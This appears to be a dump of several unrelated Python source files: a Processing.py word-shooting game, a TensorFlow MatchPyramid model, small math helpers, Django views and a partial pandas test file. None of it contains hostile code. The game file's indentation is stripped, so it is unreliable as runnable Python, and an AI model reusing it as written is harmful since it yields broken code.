text(ch, self.x + (i*16) + xoff, self.y + yoff)
class LetterSprite(object):
def __init__(self, let, x, y):
self.x = x
self.y = y
self.let = let
def draw(self):
fill(255)
textAlign(LEFT)
text(self.let, self.x, self.y)
class Fighter(object):
def __init__(self, letterq, maxp=0, initp=0):
self.maxp = maxp
self.pos = initp
self.letterq = letterq
(self.x, self.y) = self.getxy_for_pos(initp)
self.animation = ('<[@(#', '<[@(%', '<[@(*')
self.colors = ((0,255,255),(0,192,192),(0,192,192),(0,255,255),(255,0,0))
self.curframe = 0
def getxy_for_pos(self, pos):
return (fighter_offset_x + play_offset_x, play_offset_y+(pos*40))
def up(self):
self.pos -= 1
if self.pos < 0: self.pos = 0
(newx, newy) = self.getxy_for_pos(self.pos)
T.addTween(self, y=(newy-self.y), tweenTime=200, tweenType=T.OUT_EXPO)
T.addTween(self.letterq, y=(newy-self.y), tweenTime=250,
tweenType=T.OUT_EXPO)
def down(self):
self.pos += 1
if self.pos > self.maxp - 1: self.pos = self.maxp
(newx, newy) = self.getxy_for_pos(self.pos)
T.addTween(self, y=(newy-self.y), tweenTime=150, tweenType=T.OUT_EXPO)
T.addTween(self.letterq, y=(newy-self.letterq.y), tweenTime=225,
tweenType=T.OUT_EXPO)
def draw(self):
textAlign(LEFT)
textSize(16)
for i, (ch, col) in enumerate(zip(self.animation[self.curframe],
self.colors)):
fill(col[0],col[1],col[2])
text(ch, self.x + (i*16), self.y)
if frameCount % 5 == 0:
self.curframe += 1
if self.curframe >= len(self.animation):
self.curframe = 0
class LetterQueue(object):
def __init__(self, length, x, y):
assert type(length) is int, "length is not an integer"
self.q = list()
self.length = length
self.x = x
self.y = y
def append(self, letter):
assert type(letter) is str, "letter is not string"
assert len(letter) == 1, "letter is not string of length 1"
self.q.append(letter)
if len(self.q) > self.length:
            self.q = self.q[:self.length]  # was self.q[:length], which referenced an undefined name
def fill_rand_from(self, seq):
# TODO check if seq is iterable
while len(self.q) < self.length:
self.q.append(random.choice(seq))
def intersect(self, seq):
tocheck = set(seq)
newq = list()
for ch in self.q:
if ch in tocheck:
newq.append(ch)
self.q = newq
def pop(self):
return self.q.pop(0)
def letters(self):
return self.q
def shuffle(self):
random.shuffle(self.q)
def draw(self):
textAlign(LEFT)
for i, ch in enumerate(self.letters()):
fill(255 - i * 10)
textSize(16 - i)
yoff = sin(i + millis() / 300.0) * 1.8
text(ch, self.x + (i*20), self.y + yoff)
class PlayfieldState(GameState):
def __init__(self, tree, scorer, mode, slots=5):
self.tree = tree
self.letterq = LetterQueue(5, play_offset_x + fighter_offset_x + 96,
play_offset_y)
self.fighter = Fighter(self.letterq, slots-1, 0)
self.targets = [None] * slots
for i in range(slots):
self.add_target_at_slot(i)
self.populate_queue()
self.letter_sprites = list()
self.scorer = scorer
self.paused = False
self.mode = mode
self.fire_listeners = list()
def add_fire_listener(self, listener):
self.fire_listeners.append(listener)
def add_target_at_slot(self, idx):
target = TargetString(random.choice(initletterprob),
self.tree, x=-20, y=play_offset_y+(idx*40))
T.addTween(target, x=(play_offset_x+20), tweenTime=200,
tweenType=T.OUT_EXPO, tweenDelay=500)
self.targets[idx] = target
def draw(self):
textAlign(LEFT)
# draw letter slots
for i, ts in enumerate(self.targets):
ts.draw()
# draw sprites
for sp in self.letter_sprites:
sp.draw()
self.fighter.draw()
# draw letter queue
fill(255)
self.letterq.draw()
def keyPressed(self):
if self.paused: return
if key == ord('i') or (key == CODED and keyCode == UP):
self.fighter.up()
elif key == ord('k') or (key == CODED and keyCode == DOWN):
self.fighter.down()
elif key == ord('\n'):
self.detonate()
elif key == ord('z'):
self.fire()
elif key == ord('x'):
self.shuffle_queue()
elif key == 27:
self.paused = True
self.manager.add_state(PauseHelpState(callback=self.unpause))
def unpause(self):
self.paused = False
def shuffle_queue(self):
self.letterq.shuffle()
sounds['discard'].play(0)
self.scorer.attenuate_multiplier(0.5)
def detonate(self):
t = self.targets[self.fighter.pos]
if not(t.active):
return
t.active = False
if self.tree.is_word(t.content):
sounds['success'].play(0)
self.score_target(t)
T.addTween(t, alpha=-255, textsize=16, tweenTime=500,
onCompleteFunction=lambda: self.remove_target(t))
else:
sounds['failure'].play(0)
self.scorer.combobreak(t.x + len(t.content)*16, t.y)
T.addTween(t, alpha=-255, textsize=16, tweenTime=500,
onCompleteFunction=lambda: self.remove_target(t))
def fire(self):
# only fire if target able to accept
t = self.targets[self.fighter.pos]
if not(t.active):
return
sounds['shoot'].play(0)
t.active = False
popped = self.letterq.pop()
# create sprite
sprite = LetterSprite(popped, self.fighter.x, self.fighter.y)
destx = play_offset_x + (len(self.targets[self.fighter.pos].content) * 16)
desty = play_offset_y + (self.fighter.pos * 40)
# tween sprite to new position, will call letter_arrived when
# completed
destpos = self.fighter.pos
T.addTween(sprite, x=(destx-self.fighter.x), y=(desty-self.fighter.y),
tweenTime=200, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.letter_arrived(sprite, destpos))
# add to list so we can draw it
self.letter_sprites.append(sprite)
for listener in self.fire_listeners:
if hasattr(listener, 'fired'):
listener.fired(popped)
def letter_arrived(self, sprite, pos):
# called from fire(), removes sprite, adds to string, populates
# queue (also calculates score here)
self.letter_sprites.remove(sprite)
# add letter to target string, reactivate
self.targets[pos].subsume(sprite.let)
self.targets[pos].active = True
if self.tree.is_prefix(self.targets[pos].content):
self.scorer.score_letter(sprite.let, sprite.x, sprite.y)
self.cull_and_score_terminals()
self.populate_queue()
def cull_and_score_terminals(self):
        compl = lambda x: (lambda: self.remove_target(x))  # return a zero-arg callback so removal runs when the tween completes, not immediately
for i, t in enumerate(self.targets):
if self.tree.is_terminal(t.content):
t.active = False
if self.tree.is_word(t.content):
sounds['success'].play(0)
self.score_target(t)
T.addTween(self.targets[i], alpha=-255, textsize=16, tweenTime=1000,
onCompleteFunction=compl(t))
else:
sounds['failure'].play(0)
self.scorer.combobreak(t.x + len(t.content)*16, t.y)
T.addTween(self.targets[i], alpha=-255, textsize=16, tweenTime=1000,
onCompleteFunction=compl(t))
def remove_target(self, t):
assert t in self.targets, "couldn't find target!"
idx = self.targets.index(t)
self.add_target_at_slot(idx)
def remove_target_idx(self, idx):
self.add_target_at_slot(idx)
def score_target(self, target):
self.scorer.score_word(target.content, target.x + (len(target.content)*20),
target.y)
def populate_queue(self):
words = [t.content for t in self.targets]
suggested = list()
all_possible = list()
for word in words:
if self.tree.is_prefix(word):
word_possible = [x for x in self.tree.alts(word) if x != '$']
# fill queue with more letters to finish longer words
suggested += overdraw(word_possible, int(1.1*len(word)))
all_possible += word_possible
self.letterq.intersect(all_possible)
self.letterq.fill_rand_from(suggested)
def timer_done(self):
self.paused = True
sounds['etude2'].play(0)
for sp in self.letter_sprites:
T.removeTweeningFrom(sp)
self.manager.add_state(DisplayScoreState(self.scorer.score, self.mode))
class PauseHelpState(GameState):
def __init__(self, callback):
self.callback = callback
self.init_millis = millis()
def draw(self):
fill(0, 128)
rect(0, 0, width, height)
fill(255)
textAlign(CENTER)
textSize(64)
text("HELP", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
<UP>/<DN> select target
<Z> fire letter into target
<ENTER> detonate target
<X> shuffle letter magazine
Hit <ESC> again to quit to menu, or
any other key to return to the game.""", 32, 96)
def keyPressed(self):
# wait a second before registering keypresses
if millis() > self.init_millis + 1000:
if key == 27:
self.manager.remove_instances([PlayfieldState, ScoreState, TimerState,
ChallengeState])
titles = self.manager.get_instances([TitleScreenState])
assert len(titles) == 1, "wrong number of title screen states"
titles[0].fade_in()
else:
self.callback()
self.manager.remove_state(self)
class DisplayScoreState(GameState):
def __init__(self, score, mode):
self.score = score
self.mode = mode
def draw(self):
fill(0, 128)
rect(0, 0, width, height)
templ = \
"""
+---------------------------+
| FINAL SCORE |
| |
| |
| |
| <Esc> for menu |
| <C> to copy tweet w/score |
| to your clipboard |
+---------------------------+"""
textAlign(CENTER, CENTER)
textSize(16)
fill(255)
text(templ, width/2, height/2)
textSize(32)
text(str(self.score), width/2, height/2 - 16)
def keyPressed(self):
if key == 27:
self.manager.remove_instances([PlayfieldState, ScoreState, TimerState,
ChallengeState])
titles = self.manager.get_instances([TitleScreenState])
assert len(titles) == 1, "wrong number of title screen states"
titles[0].fade_in()
self.manager.remove_state(self)
elif key == ord('c'):
modestrs = {'90sec': 'in ninety seconds', '4min': 'in four minutes',
'challenge': 'with only 50 letters'}
modestr = modestrs.get(self.mode, '')
from hashlib import md5
shorthash = md5(str(self.score)+self.mode).hexdigest()[:6]
from java.awt.datatransfer import StringSelection
from java.awt import Toolkit
clipboard = Toolkit.getDefaultToolkit().getSystemClipboard()
clipboard.setContents(StringSelection("I just scored %d points %s on Characterror! http://characterror.com/?%s" % (self.score, modestr, shorthash)), None)
class StringSprite(object):
def __init__(self, content, x, y, textsize=16, r=255, g=255, b=255, a=255):
self.content = content
self.x = x
self.y = y
self.r = r
self.g = g
self.b = b
self.a = a
self.textsize = textsize
def draw(self):
textSize(self.textsize)
fill(self.r, self.g, self.b, self.a)
textAlign(CENTER)
text(self.content, self.x, self.y)
class ScoreState(GameState):
def __init__(self):
self.score = 0
self.multiplier = 10
self.score_sprites = list()
def score_letter(self, let, x, y):
letscore = 100 * self.multiplier
sprite = StringSprite(str(letscore), x, y, textsize=8)
T.addTween(sprite, y=-32, a=-255, tweenTime=1500, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.remove_sprite(sprite))
self.score_sprites.append(sprite)
self.score += letscore
self.multiplier += 1
def score_word(self, word, x, y):
wordscore = int(((len(word)*len(word))*0.5) * 1000)
wordscore = wordscore * self.multiplier
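        # i.e. word score = 500 * len(word)**2, scaled by the current multiplier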
sprite = StringSprite(str(wordscore), textsize=8, x=x, y=y, r=0, g=255, b=0)
T.addTween(sprite, y=-32, g=0, a=-127, tweenTime=1000,
tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.remove_sprite(sprite))
self.score_sprites.append(sprite)
self.score += wordscore
self.multiplier += 10
def combobreak(self, x, y):
if self.multiplier > 10:
self.multiplier = 10
sprite = StringSprite("BREAK", x, y, textsize=8,
r=255, g=0, b=0)
T.addTween(sprite, y=-32, a=-127, tweenTime=1000, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.remove_sprite(sprite))
self.score_sprites.append(sprite)
def attenuate_multiplier(self, amount):
self.multiplier = int(self.multiplier * amount)
def remove_sprite(self, sprite):
self.score_sprites.remove(sprite)
def draw(self):
for spr in self.score_sprites:
spr.draw()
fill(255)
textSize(16)
textAlign(LEFT)
text("SCORE: %012d" % self.score, 16, 16)
text("x%d" % self.multiplier, width-100, 16)
class ChallengeState(GameState):
def __init__(self, target_count, callback):
self.target_count = target_count
self.fire_count = 0
self.callback = callback
def fired(self, let):
self.fire_count += 1
if self.fire_count >= self.target_count:
self.callback()
def draw(self):
textSize(32)
textAlign(CENTER)
if self.fire_count > self.target_count * 0.9:
fill(255, 0, 0)
else:
fill(255)
text("%d / %d" % (self.fire_count, self.target_count), width/2, height-100)
class TimerState(GameState):
def __init__(self, seconds, callback):
self.seconds = seconds
self.callback = callback
self.called_callback = False
self.last_remaining = 0
def start(self):
self.started = millis()
def draw(self):
delta = millis() - self.started
delta_seconds = int(delta / 1000)
remaining = self.seconds - delta_seconds
# play tick if eight or fewer seconds left
if remaining != self.last_remaining and remaining <= 8 and remaining > 0:
sounds['tick'].play(0)
self.last_remaining = remaining
        # red if only one eighth of the time remains
textSize(32)
textAlign(CENTER)
if remaining <= self.seconds / 8:
fill(255, 0, 0)
else:
fill(255)
# call callback if time's up
if remaining <= 0:
remaining = 0
if self.called_callback is False:
self.called_callback = True
self.callback()
minutes = remaining / 60
second_remainder = remaining % 60
text("%d:%02d" % (minutes, second_remainder), width/2, height - 100)
class StarFieldState(GameState):
def __init__(self, layer_count=3, star_count=100):
self.layers = list()
self.layer_count = layer_count
for i in range(layer_count):
field = [(random.randrange(width),random.randrange(height)) for i \
in range(star_count)]
self.layers.append(field)
def draw(self):
textSize(8)
for i, layer in enumerate(self.layers):
for x, y in layer:
fill((i + 1) * (255.0 / self.layer_count))
xoff = (millis() / 25.0) * (i + 1)
text(".", (x + xoff) % width, y)
def loadtree(callback):
tree = LetterTree()
for line in open('wordlist_short'):
line = line.strip()
tree.feed(line + "$")
callback(tree)
class TitleScreenState(GameState):
def __init__(self):
self.title = "CHARACTERROR"
self.alpha = 255
self.colors = [(64, 192, 0), (96, 224, 32), (128, 255, 64),
(160, 0, 96), (192, 32, 128), (224, 64, 160),
(255, 96, 192), (0, 128, 224), (32, 160, 255)]
self.thread = None
self.init_loading_threads()
self.fading = False
self.menu = [
('instructions', 'How to play', 'Story and tutorial'),
('90sec','Timed game: 90 seconds','Get the highest score in ninety seconds!'),
('4min','Timed game: 4 minutes','You have four minutes. How high can you score?'),
('challenge','50 letter challenge', "The timer's off. How many points can you score with just 50 letters?"),
('credits', 'Credits', "Who made this game?")]
self.selected = 0
def init_loading_threads(self):
# just running one thread to load resources for now
self.thread = Thread(target=loadtree, args=(self.tree_load_done,))
self.thread.start()
def tree_load_done(self, tree):
self.tree = tree
def draw(self):
# draw banner
textSize(48)
textAlign(LEFT)
xcenter = width / 2.0
ypos = height / 3.0
xstart = xcenter - (textWidth(self.title) / 2.0)
pushMatrix()
translate(xstart, ypos)
idx = (frameCount / 32) % 9
this_col = self.colors[idx:] + self.colors[:idx]
for i, ch in enumerate(self.title):
i = i % len(self.colors)
fill(this_col[i][0], this_col[i][1], this_col[i][2], self.alpha)
text(ch, 0, 0)
translate(48, 0)
popMatrix()
# loading or menu
textAlign(CENTER)
fill(255, 255, 0, self.alpha)
textSize(16)
if self.thread.isAlive():
num = (frameCount / 9) % 4
ch = '|/-\\'
text("LOADING " + ch[num], xcenter, 2 * height / 3.0)
else:
for i, (short, content, desc) in enumerate(self.menu):
                if self.selected == i:
                    # highlight the selected entry and show its description near the bottom
                    textSize(16)
                    fill(255, 255, 0, self.alpha)
                    text(content, xcenter, (2*(width/5)) + (i*24))
                    textSize(8)
                    fill(255, self.alpha)
                    text(desc, xcenter, height - 96)
else:
fill(192, self.alpha)
textSize(16)
text(content, xcenter, (2*(width/5)) + (i*24))
textSize(8)
fill(255, 255, 0, self.alpha)
text("Choose option with UP and DOWN. Press <Z> to select.", xcenter, (height - 48))
def keyPressed(self):
if self.thread.isAlive():
return
if self.fading:
return
if key == ord('i') or (key == CODED and keyCode == UP):
self.selected -= 1
elif key == ord('k') or (key == CODED and keyCode == DOWN):
self.selected += 1
self.selected = self.selected % len(self.menu)
elif key == ord('z'):
self.fading = True
selected_option = self.menu[self.selected][0]
T.addTween(self, alpha=-255, tweenTime=1000, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.faded_out(selected_option))
def faded_out(self, opt):
# when fadeout completes, this is called
self.manager.mute(self)
if opt in ('90sec', '4min', 'challenge'):
if opt == '90sec':
remaining_time = 90
elif opt == '4min':
remaining_time = 240
scorer = ScoreState()
sketch.add_state(scorer)
playfield = PlayfieldState(self.tree, scorer, opt)
if opt == 'challenge':
challenge = ChallengeState(50, lambda: playfield.timer_done())
sketch.add_state(challenge)
playfield.add_fire_listener(challenge)
else:
timer = TimerState(remaining_time, lambda: playfield.timer_done())
sketch.add_state(timer)
timer.start()
sketch.add_state(playfield)
sounds['etude1'].play(0)
elif opt == 'instructions':
sketch.add_state(InstructionsState(self, self.tree))
elif opt == 'credits':
sketch.add_state(CreditsState(self))
def fade_in(self):
self.manager.unmute(self)
T.addTween(self, alpha=255, tweenTime=1000, tweenType=T.OUT_EXPO,
onCompleteFunction=self.faded_in)
def faded_in(self):
self.fading = False
class InstructionsState(GameState):
def __init__(self, title_screen, tree):
self.title_screen = title_screen
self.page = 0
self.tree = tree
self.init_demo()
def init_demo(self):
self.letterq = LetterQueue(5, play_offset_x + fighter_offset_x + 96,
play_offset_y)
for ch in 'cram':
self.letterq.append(ch)
self.fighter = Fighter(self.letterq, 1, 0)
self.target = TargetString('s', self.tree, play_offset_x, play_offset_y)
self.letter_sprites = list()
def draw(self):
if self.page == 0:
fill(255)
textAlign(CENTER)
textSize(64)
text("THE STORY", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
You are CAPTAIN S. PELLER,
starfighter pilot extraordinaire.
Your mission: defeat the CHARAC-
TERRORS, evil space aliens bent on
galactic dominance. Their only
weakness: a CHARACTERROR will
subsume any letter fired into it.
CHARACTERRORS forming English words
can be detonated and thus destroyed.
""", 32, 96)
pushMatrix()
translate(0, 232)
self.letterq.draw()
self.fighter.draw()
self.target.draw()
for sp in self.letter_sprites:
sp.draw()
popMatrix()
textAlign(CENTER)
textSize(16)
fill(255)
text("Hit <Z> to fire letters, then\n<ENTER> when the word is green!",
width/2, 390)
elif self.page == 1:
fill(255)
textAlign(CENTER)
textSize(64)
text("CONTROLS", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
<UP>/<DN> select target
<Z> fire letter into target
<ENTER> detonate target
<X> shuffle letter magazine
<ESC> help/quit
Words must be between three and ten
letters long. This game uses the
SOWPODS dictionary.
WARNING: Detonating a target that is
not green will reset your score
multiplier. Shuffling your magazine
may help you get at the letter you
want, but will cut your multiplier
in half.
""", 32, 96)
textAlign(CENTER)
text("Hit <Z> to continue.", width/2, 450)
elif self.page == 2:
fill(255)
textAlign(CENTER)
textSize(48)
text("HINTS & TIPS", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
* Longer words earn more points!
* Your score multiplier increases
for every letter landed, and for
every valid word detonated.
* If a target contains a string that
could never begin a valid English
word, the target is destroyed and
your score multiplier reset.
* Your magazine will always *only*
contain letters that can combine
with targets to begin valid English
words. Exercise your vocabulary!
* Words that can't be extended to
form longer words will be detonated
automatically.
""", 32, 96)
textAlign(CENTER)
text("Hit <Z> to continue.", width/2, 450)
def fire(self):
if not(self.target.active):
return
self.target.active = False
sounds['shoot'].play(0)
popped = self.letterq.pop()
sprite = LetterSprite(popped, self.fighter.x, self.fighter.y)
destx = play_offset_x + (len(self.target.content) * 16)
desty = play_offset_y + (self.fighter.pos * 40)
destpos = self.fighter.pos
T.addTween(sprite, x=(destx-self.fighter.x), y=(desty-self.fighter.y),
tweenTime=400, tweenType=T.OUT_EXPO,
onCompleteFunction=lambda: self.letter_arrived(sprite, destpos))
self.letter_sprites.append(sprite)
def letter_arrived(self, sprite, pos):
self.letter_sprites.remove(sprite)
self.target.subsume(sprite.let)
self.target.active = True
def advance_page(self):
self.page += 1
def keyPressed(self):
if self.page == 0:
if key == ord('z') and self.target.content != "scram":
self.fire()
if key == ord('\n') and self.target.content == "scram":
sounds['success'].play(0)
T.addTween(self.target, alpha=-255, textsize=16, tweenTime=1000,
onCompleteFunction=lambda: self.advance_page())
elif self.page == 1:
if key == ord('z'):
self.page = 2
elif self.page == 2:
if key == ord('z'):
self.title_screen.fade_in()
self.manager.remove_state(self)
class CreditsState(GameState):
def __init__(self, title_screen):
self.title_screen = title_screen
def draw(self):
fill(255)
textAlign(CENTER)
textSize(64)
text("CREDITS", width/2, 64)
textAlign(LEFT)
textSize(16)
text("""
Game by Adam Parrish
decontextualize.com
Made for Experimental Gameplay
Project's February 2011 competition
experimentalgameplay.com
(Yes, the stars are ASCII 0x2E)
Programmed with processing.py
github.com/jdf/processing.py
Thanks to Ben Harling for the Python
port of Tweener!
""", 32, 96)
textAlign(CENTER)
text("Hit <Z> to continue.", width/2, 450)
def keyPressed(self):
if key == ord('z'):
self.title_screen.fade_in()
self.manager.remove_state(self)
class Sketch(GameStateManager):
def setup(self):
frameRate(30)
size(640, 480)
fill(0)
background(0)
font = createFont("pcsenior.ttf", 16)
textFont(font)
sketch.add_state(StarFieldState())
sketch.add_state(TitleScreenState())
self.s = millis()
def draw(self):
background(0)
tm = float(millis())
delta = tm - self.s
self.s = tm
T.update(delta)
super(Sketch, self).draw()
T = Tweener()
sketch = Sketch()
minim = None
sounds = dict()
def setup():
global minim
sketch.setup()
minim = Minim(this)
sounds['shoot'] = minim.loadSnippet("shoot.wav")
sounds['discard'] = minim.loadSnippet("discard.wav")
sounds['failure'] = minim.loadSnippet("failure.wav")
sounds['success'] = minim.loadSnippet("success.wav")
sounds['etude1'] = minim.loadSnippet("etude1.wav")
sounds['etude2'] = minim.loadSnippet("etude2.wav")
sounds['tick'] = minim.loadSnippet("tick.wav")
def draw():
sketch.draw()
def mouseClicked():
sketch.mouseClicked()
def keyPressed():
if key == 27:
this.key = '\0'
sketch.keyPressed()
def stop():
    for snip in sounds.values():
snip.close()
minim.stop()
| true |
d5452f3967c5522801229bfa010d2f84f9f57391 | Python | luozhouyang/matchpyramid | /mp/models.py | UTF-8 | 5,810 | 2.609375 | 3 | ["Apache-2.0"] | permissive |
# Copyright 2019 luozhouyang
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from mp.indicator import Indicator
model_config = {
'query_max_len': 1000,
'doc_max_len': 1000,
'num_conv_layers': 3,
'filters': [8, 16, 32],
'kernel_size': [[5, 5], [3, 3], [3, 3]],
'pool_size': [[2, 2], [2, 2], [2, 2]],
'dropout': 0.5,
'batch_size': 32,
'vocab_size': 100, # Important!!! update vocab_size
'embedding_size': 128,
}
def build_dot_model(config):
"""Using dot-product to produce match matrix, as described in the paper."""
q_input = tf.keras.layers.Input(shape=(config['query_max_len'],), name='q_input')
d_input = tf.keras.layers.Input(shape=(config['doc_max_len'],), name='d_input')
embedding = tf.keras.layers.Embedding(config['vocab_size'], config['embedding_size'], name='embedding')
q_embedding = embedding(q_input)
d_embedding = embedding(d_input)
# dot
dot = tf.keras.layers.Dot(axes=-1, name='dot')([q_embedding, d_embedding])
# reshape to [batch_size, query_max_len, doc_max_len, channel(1)]
matrix = tf.keras.layers.Reshape((config['query_max_len'], config['doc_max_len'], 1), name='matrix')(dot)
x = matrix
for i in range(config['num_conv_layers']):
x = tf.keras.layers.Conv2D(
filters=config['filters'][i],
kernel_size=config['kernel_size'][i],
padding='same',
activation='relu',
name='conv_%d' % i)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=tuple(config['pool_size'][i]), name='max_pooling_%d' % i)(x)
x = tf.keras.layers.BatchNormalization()(x)
flatten = tf.keras.layers.Flatten()(x)
dense = tf.keras.layers.Dense(32, activation='relu')(flatten)
out = tf.keras.layers.Dense(1, activation='sigmoid', name='out')(dense)
model = tf.keras.Model(inputs=[q_input, d_input], outputs=[matrix, out])
model.compile(
loss={
'out': 'binary_crossentropy'
},
optimizer='sgd',
metrics={
'out': [tf.keras.metrics.Accuracy(), tf.keras.metrics.Recall(), tf.keras.metrics.Precision()]
})
return model
def build_cosine_model(config):
"""Using cosine to produce match matrix, as described in the paper."""
q_input = tf.keras.layers.Input(shape=(config['query_max_len'],), name='q_input')
d_input = tf.keras.layers.Input(shape=(config['doc_max_len'],), name='d_input')
embedding = tf.keras.layers.Embedding(config['vocab_size'], config['embedding_size'], name='embedding')
q_embedding = embedding(q_input)
d_embedding = embedding(d_input)
# cosine
cosine = tf.keras.layers.Dot(axes=-1, normalize=True, name='cosine')([q_embedding, d_embedding])
matrix = tf.keras.layers.Reshape((config['query_max_len'], config['doc_max_len'], 1), name='matrix')(cosine)
x = matrix
for i in range(config['num_conv_layers']):
x = tf.keras.layers.Conv2D(
filters=config['filters'][i],
kernel_size=config['kernel_size'][i],
padding='same',
activation='relu',
name='conv_%d' % i)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=tuple(config['pool_size'][i]), name='max_pooling_%d' % i)(x)
x = tf.keras.layers.BatchNormalization()(x)
flatten = tf.keras.layers.Flatten()(x)
dense = tf.keras.layers.Dense(32, activation='relu')(flatten)
out = tf.keras.layers.Dense(1, activation='sigmoid', name='out')(dense)
model = tf.keras.Model(inputs=[q_input, d_input], outputs=[matrix, out])
model.compile(
loss={
'out': 'binary_crossentropy'
},
optimizer='sgd',
metrics={
'out': [tf.keras.metrics.Accuracy(), tf.keras.metrics.Recall(), tf.keras.metrics.Precision()]
})
return model
def build_indicator_model(config):
"""Using indicator fn to produce match matrix, as described in the paper."""
q_input = tf.keras.layers.Input(shape=(config['query_max_len'],), name='q_input')
d_input = tf.keras.layers.Input(shape=(config['doc_max_len'],), name='d_input')
m = Indicator(config['query_max_len'], config['doc_max_len'], name='matrix')((q_input, d_input))
m2 = tf.keras.layers.Reshape((config['query_max_len'], config['doc_max_len'], 1), name='m2')(m)
x = m2
for i in range(config['num_conv_layers']):
x = tf.keras.layers.Conv2D(
filters=config['filters'][i],
kernel_size=config['kernel_size'][i],
padding='same',
activation='relu',
name='conv_%d' % i)(x)
x = tf.keras.layers.MaxPooling2D(pool_size=tuple(config['pool_size'][i]), name='max_pooling_%d' % i)(x)
x = tf.keras.layers.BatchNormalization()(x)
flatten = tf.keras.layers.Flatten()(x)
dense = tf.keras.layers.Dense(32, activation='relu')(flatten)
out = tf.keras.layers.Dense(1, activation='sigmoid', name='out')(dense)
model = tf.keras.Model(inputs=[q_input, d_input], outputs=[out, m])
model.compile(
loss={
'out': 'binary_crossentropy'
},
optimizer='sgd',
metrics={
'out': [tf.keras.metrics.Accuracy(), tf.keras.metrics.Recall(), tf.keras.metrics.Precision()]
})
return model
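# --- Editor's usage sketch (not part of the original module) ---
# The vocab size and sequence lengths below are illustrative placeholders, not
# values taken from the MatchPyramid paper; adjust them to your own data.
if __name__ == '__main__':
    demo_config = dict(model_config, vocab_size=30000,
                       query_max_len=100, doc_max_len=100)
    demo_model = build_dot_model(demo_config)
    demo_model.summary()  # shows the match matrix, conv/pool stack and sigmoid output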
| true |
9d824c85ed90c2972c8936e67d1e6365b7f7775e | Python | stevie-h/19.7.2021 | /math_utils.py | UTF-8 | 300 | 3.515625 | 4 | [] | no_license |
# ex23
def compare(x, y):
if x > y:
return x
elif y > x:
return y
else:
raise Exception("Numbers are equal")
def three_multiple(x):
if x % 3 == 0:
return True
else:
return False
def power(a, n):
return a ** n
| true |
f0059d3fc99cbdbbef11373b865b9772a69f0c53 | Python | Akhilchowdary97/p3 | /p3/views.py | UTF-8 | 1,672 | 2.953125 | 3 | [] | no_license |
from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return HttpResponse("<marquee>Hello ,Welcome To p3 Project</marquee>")
def home(request):
return render(request,"simple.html")
def second(request):
return render(request,"directory/second.html")
def third(request):
return render(request,"directory/third.html",context={'data':"Akki",'name':"Akhil Chowdary Maguluri"})
def fourth(request):
fruits=['apple','mango','banana','kiwi','orange']
return render(request,"directory/fourth.html",{'fruits':fruits})
def fifth(request):
return render(request,"directory/fifth.html",{'a':10,'b':17})
def urls_data(request,name):
return HttpResponse("<h1>{}</h1>".format(name))
def ab(request,a,b):
sum=int(a)+int(b)
return HttpResponse(str(sum))
def ac(request,c,d):
if int (c) > int (d):
greatest = " c Value is Greatest", c
elif int(d) > int(c):
greatest = " d Value is Greatest", d
else:
greatest = " Two Values are equal ",c,d
context = {"greatest":greatest}
return render(request,"directory/greatest.html",context)
def ad(request,e,f,g):
if int (e) > int (f) and int (e) > int (g):
greatest = " e Value is Greatest", e
elif int (f) > int (e) and int (f) > int (g):
greatest = " f Value is Greatest", f
elif int(g) > int (f) and int (g) > int (e):
greatest = " g Value is Greatest", g
elif e == f and f == g and g == e:
greatest = " Three Values are Equal",e,f,g
else:
greatest = "Two Values are equal"
context = {"greatest":greatest}
return render(request,"directory/greatest1.html",context)
| true |
ad0b0f4611fd6f19452b1e7cb010dfb6e4dcf5ed | Python | rwolst/pandas-merge-product-sum | /merge_product_sum/tests/test_mps.py | UTF-8 | 7,121 | 2.84375 | 3 | ["MIT"] | permissive |
import pytest
import pandas as pd
import numpy as np
import scipy as sp
import scipy.sparse
from merge_product_sum.mps import (merge_product_sum, to_sparse,
multiply_sparse, reverse_index_map)
@pytest.fixture()
def df1():
df = pd.DataFrame([
[20160404, 'John', 'Z_0', 0.3],
[20160404, 'John', 'Z_1', 0.2],
[20160404, 'John', 'Z_4', 0.5],
[20160404, 'Toby', 'Z_0', 0.4],
[20160404, 'Toby', 'Z_1', 0.6],
[20160404, 'Toby', 'Z_4', 0.0],
[20160407, 'John', 'Z_0', 0.1],
[20160407, 'John', 'Z_1', 0.5],
[20160407, 'John', 'Z_4', 0.4]
], columns = ['DATE', 'NAME', 'Z', 'PROB'])
# Assert group by each (DATE, NAME) and summing is 1.
return df
@pytest.fixture()
def df_large():
"""Create a large random dataframe for testing."""
# Sample the discrete sets of values (just so they are not np.arange).
N = 1000
n_date = 100
n_name = 100
n_country = 100
n_team = 100
n_z = 4
DATE_set = np.random.choice(N, n_date, replace=False)
NAME_set = np.random.choice(N, n_name, replace=False)
COUNTRY_set = np.random.choice(N, n_country, replace=False)
TEAM_set = np.random.choice(N, n_team, replace=False)
Z_set = np.random.choice(N, n_z, replace=False)
# Sample the actual values and create the dataframe.
N_1 = 3000
DATES = np.random.choice(DATE_set, N_1, replace=True)[:,None]
NAMES = np.random.choice(NAME_set, N_1, replace=True)[:,None]
Z_1 = np.random.choice(Z_set, N_1, replace=True)[:,None]
df1 = pd.DataFrame(np.concatenate((DATES, NAMES, Z_1), 1),
columns=['DATE', 'NAME', 'Z'])
## Create random probs (don't worry about summing to certain values).
df1['PROB'] = np.random.rand(len(df1))
N_2 = 10
COUNTRIES = np.random.choice(COUNTRY_set, N_2, replace=True)[:,None]
TEAMS = np.random.choice(TEAM_set, N_2, replace=True)[:,None]
